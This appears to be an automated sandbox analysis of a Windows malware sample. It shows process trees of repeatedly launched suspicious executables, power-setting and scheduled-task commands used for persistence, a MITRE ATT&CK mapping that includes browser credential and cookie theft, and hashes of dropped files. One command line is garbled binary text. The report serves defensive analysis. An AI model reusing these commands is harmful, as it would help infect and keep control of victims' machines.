C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\C:\ProgramData\BitĀʁ׈ֆ̩nǴř᭏{řݵÃřܷÃřᄄ֓ǁᣁ͉֙ᔅšɒύ͑ഝŵiᔅȡ౪ŰiӉ֪ǁ೎ְǁᑇɇǁӢֽř࿞͡౪ɇͩൌÃʱް׃͙߂׃͙౪ɇͱ᫺׉͹ᔅ׏͹ٱזÁ࡞࡞̉ᔅȶᔅ̢׵ᭅǴᲆ׻ǁუ؁Q៲ؑQǴؗYͫؗΉᵿ؝iᔅ́aᔅحΑ࡞ΙᔅіΡஹصʁԗ ʑᲵԵʑસكƉչɇʑᲵٔʑયռʑઘūʑ᳏ٞʑըū̢׵ιᮾټᓭڒ$᫮ڤૣک$ᯪƿωჀڳω̘ڹϑࠥہϡӪۈϙ؈ۏϱࢳۘЁዕۢ,ࢳܗ,ᥱܣ4ܻ֕ᔅǁᶽСᔅūЙᔅݙЩᚹݡőవƓщᔅūəᔅбᔅёୡ́ё૾́ёӹݺё஭ށёᲭȫёʌёᔪވйᔅގёɾȱй๐сᔅȫəᲆȱ͑ഝޚѹᔅūёʅȫёᔚވÁඁȣҁᵀ޾ґᱩߐҡᔅǁᣍ߹ɉᚹƙɉᚹƫ©ᔅ࿕ࠆᭅǴዊǁ᝶ɂÁ઎ࠨɉᚹƥő࠲ǁဿɇҩ࡬࠷ő࠼őࡁőࡆőÎࡍ́࡬ࡒőÎࡗőÎ࡜őÎࡡőִࡨұ࡬࡭ɉᚹࡺ͙ᵖȣˡᔅ࢈ÁઅǴƉᔅūɉàࢶɉرࢽɉִࣄɉe࣋ɉ࣒ɉéࣙɉÎ࣠ɉᚹऒӑᔅन č Ē ėŜš Ŧ¤ŜìɿðėôĒøʄüʉĀʎĄʓĈʘČʝĐʢĔʧĘʬ.+̆.3̏.;̴.C̽.K̽.S̽.[̽.c̽.k̽.s̽.{̓.͐.̽ÀėàėĀėĠėŀėŠėƀėƠėǀėǠėȀėȃėȠėɀėɠėɡėɣėʀėʁėʠėʡėˀėˁėˠėˡėˣζ̀ė́ė̠ė̡ė̀ė́ė͡ė΁ėΡėΣė
1⤵
PID:12648

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:11764
- C:\Users\Admin\Desktop\Files\fusca%20game.exe
  C:\Users\Admin\Desktop\Files\fusca%20game.exe ..
  2⤵
  PID:18412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:14712
- C:\Users\Admin\Desktop\Files\fusca%20game.exe
  C:\Users\Admin\Desktop\Files\fusca%20game.exe ..
  2⤵
  PID:17648

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\explorer\WmiPrvSE.exe
1⤵
PID:3116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\explorer\WmiPrvSE.exe
1⤵
PID:13388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:1612
- C:\Users\Admin\Desktop\Files\fusca%20game.exe
  C:\Users\Admin\Desktop\Files\fusca%20game.exe ..
  2⤵
  PID:8936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:5712
- C:\Users\Admin\Desktop\Files\fusca%20game.exe
  C:\Users\Admin\Desktop\Files\fusca%20game.exe ..
  2⤵
  PID:5144

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:15536
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  PID:7892
- - C:\Program Files (x86)\Internet Explorer\iexplore.exe
    "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
    3⤵
    PID:13672

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:16100
- C:\Users\Admin\Desktop\Files\fusca%20game.exe
  C:\Users\Admin\Desktop\Files\fusca%20game.exe ..
  2⤵
  PID:19048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:16108
- C:\Users\Admin\Desktop\Files\fusca%20game.exe
  C:\Users\Admin\Desktop\Files\fusca%20game.exe ..
  2⤵
  PID:14860

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Program Files (x86)\TCP Subsystem\tcpss.exe
1⤵
PID:16328

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:14652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:8724
- C:\Users\Admin\Desktop\Files\fusca%20game.exe
  C:\Users\Admin\Desktop\Files\fusca%20game.exe ..
  2⤵
  PID:17212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:14128
- C:\Users\Admin\Desktop\Files\fusca%20game.exe
  C:\Users\Admin\Desktop\Files\fusca%20game.exe ..
  2⤵
  PID:19888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\C:\ProgramData\Bit
1⤵
PID:15724

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:9520
- C:\Users\Admin\Desktop\Files\fusca%20game.exe
  C:\Users\Admin\Desktop\Files\fusca%20game.exe ..
  2⤵
  PID:18556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:12608
- C:\Users\Admin\Desktop\Files\fusca%20game.exe
  C:\Users\Admin\Desktop\Files\fusca%20game.exe ..
  2⤵
  PID:2232

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:4876

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:15548

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:16592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:16920
- C:\Users\Admin\Desktop\Files\fusca%20game.exe
  C:\Users\Admin\Desktop\Files\fusca%20game.exe ..
  2⤵
  PID:1188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:17340
- C:\Users\Admin\Desktop\Files\fusca%20game.exe
  C:\Users\Admin\Desktop\Files\fusca%20game.exe ..
  2⤵
  PID:14312

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\app_data.exe
1⤵
PID:16464
- C:\ProgramData\app_data.exe
  C:\ProgramData\app_data.exe
  2⤵
  PID:19644

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:12412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:17260
- C:\Users\Admin\Desktop\Files\fusca%20game.exe
  C:\Users\Admin\Desktop\Files\fusca%20game.exe ..
  2⤵
  PID:18888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:16788
- C:\Users\Admin\Desktop\Files\fusca%20game.exe
  C:\Users\Admin\Desktop\Files\fusca%20game.exe ..
  2⤵
  PID:19528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:14760
- C:\Users\Admin\Desktop\Files\fusca%20game.exe
  C:\Users\Admin\Desktop\Files\fusca%20game.exe ..
  2⤵
  PID:21408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\C:\ProgramData\Bit
1⤵
PID:9592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:13696
- C:\Users\Admin\Desktop\Files\fusca%20game.exe
  C:\Users\Admin\Desktop\Files\fusca%20game.exe ..
  2⤵
  PID:4468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:17740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Program Files (x86)\TCP Subsystem\tcpss.exe
1⤵
PID:17788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:18164
- C:\Users\Admin\Desktop\Files\fusca%20game.exe
  C:\Users\Admin\Desktop\Files\fusca%20game.exe ..
  2⤵
  PID:7888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:18284
- C:\Users\Admin\Desktop\Files\fusca%20game.exe
  C:\Users\Admin\Desktop\Files\fusca%20game.exe ..
  2⤵
  PID:16380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:6948
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  PID:16200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:18008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:15736

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:14680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\C:\ProgramData\Bit
1⤵
PID:1052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:18616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:18624

C:\Users\Admin\Desktop\Files\AA_v3.exe
"C:\Users\Admin\Desktop\Files\AA_v3.exe" -service -lunch
1⤵
PID:14408
- C:\Users\Admin\Desktop\Files\AA_v3.exe
  "C:\Users\Admin\Desktop\Files\AA_v3.exe"
  2⤵
  PID:12120

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:6804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:11540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:13384

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:14096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\C:\ProgramData\Bit
1⤵
PID:7060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:4212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:6396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:13348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:8000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:648

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
- Power Settings
PID:19628

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:19636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:19804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:19820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\C:\ProgramData\Bit
1⤵
PID:20244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:8936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:19584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:20796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:20804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\"
1⤵
PID:21316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:17304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:4332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe"
1⤵
PID:13772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe"
1⤵
PID:19480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\C:\ProgramData\Bit
1⤵
PID:5144

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\app_data.exe
1⤵
PID:20612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:20636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:20960

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:20980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:21136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:18768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:8856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:21384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:16188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:13048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:9496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:20688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:12932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\C:\ProgramData\Bit
1⤵
PID:10828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:15916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:7256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:21552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:21560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:21672

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:23300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:23308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:17256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:12392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:18744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:18736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\C:\ProgramData\Bit
1⤵
PID:15572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:21580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:17348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:22940

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:22692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:22680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\a0c2aee0-27b4-4936-83d3-41b66a8a5172\Autoit3.exe" "C:\a0c2aee0-27b4-4936-83d3-41b66a8a5172\lionheartedly.a3x"
1⤵
PID:14596

C:\Windows\system32\cmd.exe
cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:16640

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Modify Authentication Process

T1556

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Authentication Process

T1556

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\icudtl.dat.58B0DF04A71DFDFBFC05EFB2BC247D54A8D1F08F81CA0A7A8502ACB66FA25A06

Filesize
16B

MD5
83558cb028dab9eeccc8f65cceaf247c

SHA1
098ec8b98b1383905fcbcf75de53dde815dc66ec

SHA256
7613d17928ca84bdfd89681ec9f5a3d56450833a0ca704d36f9b04fc06f82edc

SHA512
ba429d9aedd83d2a1dc3773457bfa089a0a3705bb5132121fd11c4eab316a8b17ce7fc68f7230fd6f5f653c480edc0567464a36e94a4e034f88c9f4e0b3b263b

Download Submit
C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt.58B0DF04A71DFDFBFC05EFB2BC247D54A8D1F08F81CA0A7A8502ACB66FA25A06

Filesize
32KB

MD5
1154816f40c343222fbee7a24b535e5b

SHA1
6f4300385547345a676f2ff5f78e6d7e0d7bfcc4

SHA256
8c5c01c65a40ed7656e38c6a1beba732b96122a1e9cbbaad95b74f34044f8f5a

SHA512
38a438b53e85035b10f075c040ae34ab97630adde137a17cc7f09ade27ac8f26e44a1154ef68b9b1f5f30823061c809ed74e00eab060ec866be955d0c38db3a4

Download Submit
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

Filesize
158KB

MD5
bfb045ceef93ef6ab1cef922a95a630e

SHA1
4a89fc0aa79757f4986b83f15b8780285db86fb6

SHA256
1f6b69d11a3066e21c40002a25986c44e24a66f023a40e5f49eecaea33f5576d

SHA512
9c1bfa88b5b5533ede94158fa3169b9e0458f1ceae04dae0e74f4c23a899ce27d9109bd298a2053fb698e2ed403f51a9b828ee9fa9d66b54a18cd0d969edc194

Download Submit
C:\Program Files (x86)\ULTIME MULTIHACK REBORN.EXE

Filesize
86KB

MD5
0739a4b039910c9ecc48661e25279e6e

SHA1
02bf3b0265850bc13e85ac9bb421b88b6babbcaf

SHA256
9df65940d3f2230b276e9ee989f15a94855e07cf2aa04210353f7a9e9a62db4a

SHA512
e8a8876f4cfc2657e2b355b288fb8386e40131aeacc18aba1036ea5e60cf9a571f8da4ead987751db16fba5054d50b3dac9c399e5dff38fc64bf22c4fb3cb92f

Download Submit
C:\Program Files (x86)\VLC1.EXE

Filesize
251KB

MD5
3a0071fc42e1305afa1bc5d3d8233068

SHA1
711402cabd474d742d31509f17b26493683d61d3

SHA256
d41679ada9aabdfd4a55f25a5721d6a5dfbdee53afcf0d1cf319276e28941afa

SHA512
1a0b0bd341fe097f924517e8848d4012a93286402d79cdd67cf2cfc3225bd3785f81d329348ae1e0afc308ea98790dc89872f41cf3e9843a9481512832a403d8

Download Submit
C:\Program Files (x86)\seetrol\client\SeetrolClient.exe

Filesize
710KB

MD5
4ed27cd391e16b0e256c76afc1f986c3

SHA1
e0d705f87f5b5334a81d18126b18a9a39f8b6d5e

SHA256
2096a5e42c046c360c7cd646309a0e7dbbaaed00e84e242166108464b7b0ca22

SHA512
7e9208d6782fa8ed08c4b896f314a535a5e38d18c4b66a2813698007d0efeea8014ef4c0bf4c139457c826d05eae4fd241c2db419a761b709f4f118bf0f9d1b6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnGraphiteCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
8a12745c5f98df9022024d3cc7fe55eb

SHA1
ae2247fec52e12a7e5fb17bbd992e12f18788e8d

SHA256
d94e7c1104eae7ef107bc3238dbd86005eb9fb3e4ad4afbf5290e11701259020

SHA512
b1d1d199b4226ae9770a88d44cca809ed30431f01529df5f2bf93f0aa068542915d46479d30bf01105fb8c174f8e2ef182b524b42e661b488a61cf1768f78128

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
d8c3936887212864f8f4732a3973166b

SHA1
efe952280a947d83e3f33da0c23bb030ea03e503

SHA256
41e781d41ee7602e3a3167298f2c7c6b17529114f87c200e90b18395b8bb807c

SHA512
b4ea3cc747fbbfc84a42629bd47a349e4102519049fb5ad8914fb95d3b60bc7608f925f4577ad615faa2765756a35ec66eb1f7854580fc67abb8e8da906f1ece

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
21fdbd3edc14ce1320d34c4c2a6f0479

SHA1
6cd5e0d985a2e6e28225421da680da0a7df7206c

SHA256
96452e49d73a92a6c3d69b929febd88b70e7c40cbc4e78ca0b02436905f9a12f

SHA512
64b2b7d85a78da4389d0c51aa008d87b4a16cb41bd29ddf36edceb256558240f188d4bd25d2c7f75ec4cabd0ab177f3e90c62bb580ac22c74907fb385a1ec5d3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
36aaefed7ec6a53098509dfdf845a2eb

SHA1
116a28d50286d216a39f16269c671d6c2c97fe87

SHA256
4598ac80a3d94780f1b4629484eecb6c4cdccab214a8c4cfe9fce321eea7fd36

SHA512
5d890d80539576c89f5c7be8de2333e1c83f37175050638b810abaf3d0a6fde6ac786fd1e8f6d6faee125a5702a1b2406221eaf890db5e52557d3182bdd1ed84

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
14da4b28c8531883002743783c586504

SHA1
8b3bbe28dde75d17b591b95125fbb1d153bad3f4

SHA256
52b3add02aec8f836ea81278a3f932543d9b91fdb48bbdc8d897da8031144113

SHA512
5c42f2ce41feb4dc28196285a919ba215163174adfaafab4fa5d08d6f1ba6125be2f35a01751a360f46dc3a330060608dee60ea97eb8cb0ad642aa64edc230e3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57b3a0.TMP

Filesize
48B

MD5
b15b4e66031a25fc793525050bcacb1d

SHA1
12098b754ca8f4a52edd139e657807698975d670

SHA256
7d0d511d8b0f4f0b0693dd845a4a7b3e11e776a0b2645ee795222ad8c2b4abb2

SHA512
